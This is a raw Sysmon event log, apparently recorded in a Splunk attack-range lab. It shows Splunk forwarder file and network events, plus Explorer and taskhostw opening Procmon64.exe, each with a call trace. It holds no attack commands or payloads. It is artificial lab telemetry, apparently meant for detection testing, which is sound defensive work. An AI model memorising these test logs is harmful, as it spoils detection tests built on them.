Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01AF5B35E39B5AE2B94F595D13214DA7,SHA256=08DF54089C76DFEA4161F0DE9BB3868A6DA9649A052E37E2BD89AEC92EC8AA61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:36.143{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2143BE4A514E9C5472C5BFFFD9E52FAD,SHA256=FE9E1C47534D9C8FC90EE0F01512F4E2FF3533959CA6E251401CA37B610006EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:36.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06900345454F7AF4484DA54F9ED02731,SHA256=E00A10AAABC6EC68EDB1A5AC77E2A260C5B32FA82F800676C18C950214D4C500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:37.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8567E758877F100556535283B293D0D4,SHA256=0E69A54C42F3D58862BE07B14E580108821565F842C900B6119D060084E76D58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:37.175{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F892301E840AD1394EA242862D85E9,SHA256=63EC2BBEAAEBD7F58C346E8F04CDD710F3E196AE33DB3F24EB6D3E529CB059FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:38.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBDF4FA0A1F5923370F27CD9C98E8E33,SHA256=9A82BB56C66E99350B4CD16D6B1269C2D6DFE5E59C4084128C701E95B2DC5904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:38.206{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D3D7E5277C0917F13263C166B4D2A4,SHA256=1ED2823922360BB2F34CE802EB3C7DAC6FB31ADE3EDC5CFE8FDB4C6E4A6C8988,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:36.493{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51362-false10.0.1.12-8000- 23542300x8000000000000000216937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:39.221{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1925407459DD0EB541F0CC6DA3BB7C8,SHA256=4F5B7CA25ED2A6A2E2511E1DCF719F789A071A5E3012895BBF22565AFD0F9066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:39.865{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:39.284{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9695F0A9E1891CDB629AF17C075939D,SHA256=6C86A42BE712B2A8C8903686D0D4A1DCD1D6A9125D74621BB9A2C5D12F3403D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:40.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A632D8B652CED1613D7318D3B5CDF588,SHA256=175D98538FCECB881398B1597021A40493E6929F417D471C755C90978AC48E44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:40.299{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E207466E02CB3FC885EA0DE088B52C37,SHA256=EF318C455118E46FBA1E7CC9DD27A0E0E5C2F879AC5C667C7C59228E65091AC7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:39.573{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53501-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000289018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:39.290{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53500-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000289017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:41.330{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8369EA5EDF8BD21669C4CF2A4BD7C9D,SHA256=118D5EAA78E407524C769CD74D6D42C653F3ADE34EE0D52E55D00C7677D661A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:41.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AD675B59974D097E75E418942078F53,SHA256=2BEAD70238F4A408F6F6D9FDB8A84F908EFDFA46DA336D1FA3013928FE9E744C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:42.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AEDF2698FFEC13E9F5DD0AAD91A3E0B,SHA256=D6DB05E574AC6B3C119277F40DB864D09BBEEA6FBB1341C4AEFF5922A4D01914,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.905{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.905{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.905{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.489{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.489{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.489{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.347{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF4CFB6FE2A1E2020D0FBB0D9337BE1,SHA256=02BD16E9A6A270DA76C89889E39845FB6BEDB0E711ADF370286E9224818F5FCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.269{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.269{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.269{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.269{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.269{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.268{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.265{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.247{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.084{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000216943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:43.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E90F546CCF947ECB8982BDE547FA381,SHA256=590821AB8A6D34EA0639702B8225C31D562466A2BC9532550EA2AC37703E4294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:43.352{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0A1B68C8D8B0346A7FCCD5456C6821,SHA256=9A4848798B6F9C281972E8E327BDDA55856BF1D83631E166C58A24F1E6508B38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:41.665{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51363-false10.0.1.12-8000- 23542300x8000000000000000289040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:43.090{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=206688D54190AB2851E4B2D28CD2D70C,SHA256=B3726881E6E43E0BFB017964EAB756F19C5500E10263F183C12B69A9F161DE33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:43.090{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FCA84D87D29EEEA34AF1DCA0793AA3E,SHA256=2B0AAB447007BB4E0FA4C552953CD03705C4279C5B1C19471D2E24DDCE7D4677,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 